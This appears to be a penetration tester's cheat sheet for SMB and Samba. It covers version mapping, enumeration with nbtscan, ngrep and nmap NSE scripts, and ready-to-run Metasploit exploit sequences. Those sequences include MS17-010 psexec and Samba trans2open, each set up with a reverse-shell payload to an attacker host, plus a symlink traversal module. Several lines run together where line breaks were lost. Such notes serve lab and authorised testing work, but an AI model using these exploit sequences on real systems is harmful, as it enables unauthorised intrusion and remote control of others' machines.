SMB1=> Win2000 / XP / 2003
SMB2.0 => Vista / 2008
SMB2.1 => Win7 / 2008R2
SMB3.0 => Win8 / 2012
SMB 3.02 => Win8.1 / 2012R2
# Configuration tips# Can be usefull to configure /etc/samba/smb.conf with:
client min protocol= SMB2
client max protocol= SMB3
# Then
service smbd restart
Identification
# Port 139# Using nbtscan to identify host/domain
nbtscan IP (identifier le nom/domaine)# Identity SMB2 support using metasploit
use auxiliary/scanner/smb/smb2
set RHOST IP
run
# Discover real samba version if hidden
ngrep -i -d tap0 ‘s.?a.?m.?b.?a.*[[:digit:]]’ & smbclient -L //IP
### Services and Resources Scanning# Base nmap
nmap -v --script=xxxx -p T:139,445 <IP>
# Hard nmap
nmap -n -sV --version-intensity=5 -sU -sS -Pn -p T:139,445,U:137 --script=xxx <IP>
# SMB Relate NSE Scripts# Try to retrieve NetBIOS and MAC
nbstat
# Enum
smb-enum-domains
smb-enum-groups
smb-enum-processes
smb-enum-sessions
smb-os-discovery
smb-server-stats
smb-system-info
# Attempts to retrieve useful information about files shared on SMB volumes
smb-ls
# Queries information managed by the Windows Master Browser
smb-mbenum
# Try to print something
smb-print-text
# Get security level information about SMB
smb-security-mode
# Vulns
smb-vuln-conficker (dangerous, can crash target)
smb-vuln-ms06-025 (Buffer overflow in RRAS)
smb-vuln-ms07-029 (Buffer overflow which can crash the RPC intrface in the DNS Server)
smb-vuln-ms08-067 (Buffer overflow/RCE. Dangerous, can crash the target)
smb-vuln-ms10-054 (Remote Memory Corruption. Result is BSOD -> DANGEROUS)
smb-vuln-ms10-061 (Print vulnerability. Safe and can\'t crash the target)
smb-vuln-ms17-010 (RCE, just checking if vulnerable)
# Using metasploit (IMPORTANT MS17_010_PSEXEC is a staged payload, means you need meterpreter !)(IMPORTANT 2, if object can\'t be found, try to modify your target !)
use exploit/windows/smb/ms17_010_psexec
set SHARE ADMIN$
set SMBDomain ALICE
set ALLOW_GUEST trueset LPORT 445set LHOST 10.11.0.179
set RHOST 10.11.1.5
set TARGET 3(TARGET 1= PowerShell / TARGET 2= Native / TARGET 3=MOF=> besoin du share ADMIN$)set PAYLOAD windows/shell/reverse_tcp
set VERBOSE trueset DBGTRACE trueset EXITFUNC thread
exploit -j
Trans2open Exploitation
# Samba 2.2.X are usually vulnerable to trans2open# Using metasploit
use exploit/linux/samba/trans2open
set VERBOSE trueset PAYLOAD linux/x86/shell_reverse_tcp
set RHOST IP
set LPORT 443set LHOST IP
exploit -j -z
Samba 3.4.5 Symlink Directory Traversal
# You can mount the root fiilesystem to a share you can access
https://www.exploit-db.com/exploits/33599
# Using metasploit
https://www.exploit-db.com/exploits/33598
use auxiliary/admin/smb/samba_symlink/traversal